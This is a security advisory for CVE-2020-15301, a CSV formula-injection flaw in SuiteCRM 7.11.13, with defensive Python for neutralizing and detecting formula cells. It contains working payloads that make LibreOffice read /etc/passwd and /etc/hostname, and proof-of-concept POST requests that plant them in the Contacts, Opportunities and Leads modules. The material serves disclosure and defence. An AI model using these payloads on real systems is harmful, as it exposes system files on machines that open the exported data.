Vendor | SalesAgility
Product | SuiteCRM |
Affected Version(s) | 7.11.13 and probably prior
Tested Version(s) | 7.11.13 |
Vendor Notification | 10 June 2020 |
Advisory Publication | 10 June 2020 [without technical details] |
Vendor Fix | 7.11.17 |
Public Disclosure | 05 November 2020 |
Latest Modification | 05 November 2020 |
CVE Identifier | CVE-2020-15301 |
Product Description | SuiteCRM is a software fork of the popular Customer Relationship Management (CRM) system SugarCRM, developed and maintained by SalesAgility. It is a free and open-source alternative to SugarCRM.
Credits | Luis Noriega, Security Researcher & Penetration Tester @wizlynx group |
CSV Injection Vulnerability
Severity: Medium | CVSS Score: 5.4 | CWE-ID: CWE-74 | Status: Open
Vulnerability Description
SuiteCRM 7.11.13, and probably prior versions, is affected by a CSV injection vulnerability (also known as formula injection). Any authenticated user who can create or edit records in the Accounts, Contacts, Opportunities or Leads modules can store a malicious formula in the record's text fields. When an administrator later uses the Download Import File Template feature to export the module's records to a CSV file and opens that file in a spreadsheet application, the stored formula is evaluated.
CVSS Base Score (CVSS v3 vector AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)
Attack Vector | Network | Scope | Changed |
Attack Complexity | Low | Confidentiality Impact | Low |
Privileges Required | Low | Integrity Impact | Low |
User Interaction | Required | Availability Impact | None |
The vulnerability stems from the lack of content validation when the application embeds user-supplied input in CSV files: a cell that begins with '=' (or with '+', '-' or '@') is written verbatim, so when the exported file is opened in a spreadsheet application the cell is evaluated as a formula instead of being displayed as text. Any user with rights to create records in the Accounts, Contacts, Opportunities or Leads modules can plant such a payload; it fires when an administrator later exports the records with the Download Import File Template feature and opens the resulting file.
The following payloads, which use LibreOffice Calc's external reference syntax ('file:///path'#$Sheet.A1) to pull a local file into the cell, were used to exploit the vulnerability.
='file:///etc/passwd'#$passwd.A1
='file:///etc/hostname'#$hostname.A1
The following screenshot shows the Accounts module, which lets admin users create new accounts. The yellow-highlighted fields have been populated with CSV injection payloads (values starting with the '=' symbol).
The screenshot below shows the POST request made to the server with the payloads shown above.
The screenshot below shows the newly created account (yellow-highlighted). As can be seen, the application does not sanitize values starting with the '=' symbol; they are stored verbatim.
As a demonstration, the account details were downloaded as an admin user with the Download Import File Template feature. This was done on the system hosting the SuiteCRM application, so the file:// references in the payloads resolve against that host; in general they resolve on whichever machine opens the exported file.
LibreOffice Calc was used to open the resulting Accounts.csv file. On opening the file, the user is prompted, as shown in the following screenshot, to confirm the import of its content.
After confirming, the file opens and the payload is executed: the contents of /etc/passwd and /etc/hostname are displayed in the Name and Website fields, respectively.
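As an added illustration (this is example code written for this page, not SuiteCRM's own export code), the following Python models both sides of the issue: an export routine that writes cell values verbatim, as the advisory describes, beside a hardened variant that prefixes formula-triggering cells with a single quote and quotes every field, plus a check that scans a finished CSV for cells a spreadsheet would evaluate. The record fields (name, website, phone_office) and the sample rows are constructed; the two payloads are the ones listed above.

```python
import csv
import io

# Leading characters that make LibreOffice Calc / Excel treat an imported CSV
# cell as a formula. Tab and CR are included because some importers still
# evaluate a cell that begins with them followed by '='.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Payloads from the advisory: LibreOffice external-file references.
PASSWD_PAYLOAD = "='file:///etc/passwd'#$passwd.A1"
HOSTNAME_PAYLOAD = "='file:///etc/hostname'#$hostname.A1"


def is_formula_cell(value: str) -> bool:
    """True if a spreadsheet importer would evaluate this cell as a formula."""
    return value.startswith(FORMULA_TRIGGERS)


def neutralize_cell(value: str) -> str:
    """Defuse a formula-looking cell for CSV export.

    A leading apostrophe makes LibreOffice and Excel keep the cell as text.
    Quoting the field with double quotes alone does not help: importers strip
    the CSV quotes before deciding whether the content is a formula.
    """
    return "'" + value if is_formula_cell(value) else value


def export_records(records, fieldnames, harden=True) -> str:
    """Serialize records to CSV text.

    harden=False mirrors the vulnerable behaviour (values written verbatim);
    harden=True neutralizes formula cells and quotes every field so leading
    whitespace or control characters cannot be trimmed away on import.
    """
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames,
                            quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writeheader()
    for rec in records:
        row = {k: str(rec.get(k, "")) for k in fieldnames}
        if harden:
            row = {k: neutralize_cell(v) for k, v in row.items()}
        writer.writerow(row)
    return buf.getvalue()


def formula_cells(csv_text: str):
    """Return (row_number, column, value) for every cell in a CSV that a
    spreadsheet would evaluate. Useful as a pre-release check on exports."""
    reader = csv.DictReader(io.StringIO(csv_text))
    hits = []
    for i, row in enumerate(reader, start=1):
        for col, val in row.items():
            if isinstance(val, str) and is_formula_cell(val):
                hits.append((i, col, val))
    return hits


# Constructed sample: an Accounts record populated the way the advisory
# describes, followed by a benign one. The field names are assumptions.
FIELDS = ["name", "website", "phone_office"]
SAMPLE_RECORDS = [
    {"name": PASSWD_PAYLOAD, "website": HOSTNAME_PAYLOAD, "phone_office": "+1 555 0100"},
    {"name": "ACME Ltd", "website": "https://example.test", "phone_office": "555 0100"},
]

if __name__ == "__main__":
    vulnerable = export_records(SAMPLE_RECORDS, FIELDS, harden=False)
    hardened = export_records(SAMPLE_RECORDS, FIELDS, harden=True)
    print("cells evaluated in vulnerable export:", formula_cells(vulnerable))
    print("cells evaluated in hardened export:", formula_cells(hardened))
```

Note the phone number in the first sample row: it begins with '+', so the hardened export rewrites it to '+1 555 0100 as well. The same rule that stops the '=' payloads touches legitimate values such as international dialling codes and negative numbers, so whatever consumes the export has to tolerate (or strip) the leading apostrophe; that trade-off is the reason the check is applied at export time rather than at input time, where it would corrupt stored data.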
Contacts Module
POST /SuiteCRM-7.11.13/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/SuiteCRM-7.11.13/index.php?action=ajaxui
Content-Type: multipart/form-data; boundary=---------------------------34457625816576156072127013256
Content-Length: 6815
Connection: close
Cookie: sugar_user_theme=SuiteP; ck_login_id_20=1; ck_login_language_20=en_us; PHPSESSID=5godhdu05r7l0q1gircoon0q1b
Upgrade-Insecure-Requests: 1

-----------------------------34457625816576156072127013256
Content-Disposition: form-data; name="module"

Contacts
...
-----------------------------34457625816576156072127013256
Content-Disposition: form-data; name="first_name"

=1336+1
-----------------------------34457625816576156072127013256
Content-Disposition: form-data; name="last_name"

='file:///etc/passwd'#$passwd.A1
-----------------------------34457625816576156072127013256
Content-Disposition: form-data; name="phone_work"

=1+2
-----------------------------34457625816576156072127013256
Content-Disposition: form-data; name="phone_mobile"

-----------------------------34457625816576156072127013256
Content-Disposition: form-data; name="title"

='file:///etc/hostname'#$hostname.A1
-----------------------------34457625816576156072127013256
Content-Disposition: form-data; name="department"
Opportunities Module
POST /SuiteCRM-7.11.13/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/SuiteCRM-7.11.13/index.php?action=ajaxui
Content-Type: application/x-www-form-urlencoded
Content-Length: 547
Connection: close
Cookie: sugar_user_theme=SuiteP; ck_login_id_20=1; ck_login_language_20=en_us; PHPSESSID=5godhdu05r7l0q1gircoon0q1b
Upgrade-Insecure-Requests: 1

module=Opportunities&record=&isDuplicate=false&action=Save&return_module=Opportunities&return_action=DetailView&return_id=&module_tab=&contact_role=&relate_to=Opportunities&relate_id=&offset=1&name=%3D%27file%3A%2F%2F%2Fetc%2Fpasswd%27%23%24passwd.A1&account_name=Luis&account_id=546e014e-2429-6e3d-7afd-5ede65613d1f&currency_id=-99&date_closed=06%2F02%2F2020&amount=122323&opportunity_type=&sales_stage=Prospecting&lead_source=&probability=10&campaign_name=&campaign_id=&next_step=%3D1%2B4&description=&assigned_user_name=admin&assigned_user_id=1
Leads Module
POST /SuiteCRM-7.11.13/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/SuiteCRM-7.11.13/index.php?action=ajaxui
Content-Type: multipart/form-data; boundary=---------------------------6926285227250051811612406990
Content-Length: 6982
Connection: close
Cookie: sugar_user_theme=SuiteP; ck_login_id_20=1; ck_login_language_20=en_us; PHPSESSID=5godhdu05r7l0q1gircoon0q1b
Upgrade-Insecure-Requests: 1

-----------------------------6926285227250051811612406990
Content-Disposition: form-data; name="module"

Leads
-----------------------------6926285227250051811612406990
Content-Disposition: form-data; name="record"

-----------------------------6926285227250051811612406990
Content-Disposition: form-data; name="last_name"

='file:///etc/passwd'#$passwd.A1
-----------------------------6926285227250051811612406990
Content-Disposition: form-data; name="phone_work"

=1+2
-----------------------------6926285227250051811612406990
Content-Disposition: form-data; name="title"

='file:///etc/hostname'#$hostname.A1
-----------------------------6926285227250051811612406990
Content-Disposition: form-data; name="phone_mobile"

=1+2
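The detection side: every request above carries its payload in an ordinary form field, so the same leading-character check can be applied at the web tier or over request logs before the value reaches the database. The Python below is an added example written for this page, not part of the advisory or of SuiteCRM. It parses the two body encodings used in the proof of concept (application/x-www-form-urlencoded and multipart/form-data, the latter with a minimal parser that assumes CRLF line endings and simple text fields, no file parts) and returns the fields whose values a spreadsheet would evaluate. The two sample bodies are constructed from the Opportunities and Leads requests above, shortened to the relevant fields.

```python
from urllib.parse import parse_qsl

# Same trigger set a CSV importer reacts to (see the neutralization example).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def formula_fields(fields):
    """Return the (name, value) pairs whose value would be evaluated as a formula."""
    return [(name, value) for name, value in fields if value.startswith(FORMULA_TRIGGERS)]


def parse_urlencoded(body: str):
    """Decode an application/x-www-form-urlencoded body into (name, value) pairs."""
    return parse_qsl(body, keep_blank_values=True)


def parse_multipart(body: str, boundary: str):
    """Minimal multipart/form-data parser for text fields.

    Assumes CRLF line endings as browsers send them and no nested multiparts;
    parts without a Content-Disposition name are skipped.
    """
    fields = []
    delimiter = "--" + boundary
    for part in body.split(delimiter):
        part = part.strip("\r\n")
        if not part or part == "--":          # preamble or closing delimiter
            continue
        head, sep, value = part.partition("\r\n\r\n")
        if not sep:                           # headers without a body
            continue
        name = None
        for line in head.split("\r\n"):
            if line.lower().startswith("content-disposition:") and 'name="' in line:
                name = line.split('name="', 1)[1].split('"', 1)[0]
        if name is not None:
            fields.append((name, value))
    return fields


def scan_request(content_type: str, body: str):
    """Dispatch on Content-Type and return the formula-looking form fields."""
    ctype, _, params = content_type.partition(";")
    ctype = ctype.strip().lower()
    if ctype == "application/x-www-form-urlencoded":
        return formula_fields(parse_urlencoded(body))
    if ctype == "multipart/form-data":
        boundary = None
        for param in params.split(";"):
            key, _, val = param.strip().partition("=")
            if key.lower() == "boundary":
                boundary = val.strip('"')
        if boundary is None:
            raise ValueError("multipart/form-data without a boundary parameter")
        return formula_fields(parse_multipart(body, boundary))
    raise ValueError("unsupported content type: " + ctype)


# Constructed from the Opportunities request above, reduced to a few fields.
OPP_BODY = ("module=Opportunities&action=Save"
            "&name=%3D%27file%3A%2F%2F%2Fetc%2Fpasswd%27%23%24passwd.A1"
            "&account_name=Luis&next_step=%3D1%2B4&assigned_user_name=admin")

# Constructed from the Leads request above, with the page's boundary value.
BOUNDARY = "---------------------------6926285227250051811612406990"
LEAD_BODY = "\r\n".join([
    "--" + BOUNDARY, 'Content-Disposition: form-data; name="module"', "", "Leads",
    "--" + BOUNDARY, 'Content-Disposition: form-data; name="last_name"', "",
    "='file:///etc/passwd'#$passwd.A1",
    "--" + BOUNDARY, 'Content-Disposition: form-data; name="phone_work"', "", "=1+2",
    "--" + BOUNDARY, 'Content-Disposition: form-data; name="title"', "",
    "='file:///etc/hostname'#$hostname.A1",
    "--" + BOUNDARY + "--", "",
])

if __name__ == "__main__":
    print("Opportunities:", scan_request("application/x-www-form-urlencoded", OPP_BODY))
    print("Leads:", scan_request("multipart/form-data; boundary=" + BOUNDARY, LEAD_BODY))
```

A hit from this scanner is a signal, not a verdict: values beginning with '+' or '-' are common in legitimate CRM data (phone numbers, negative amounts), so at the edge it is better to alert on '=' and '@' and to leave the binding decision to output encoding at export time, which is where the vendor fix belongs.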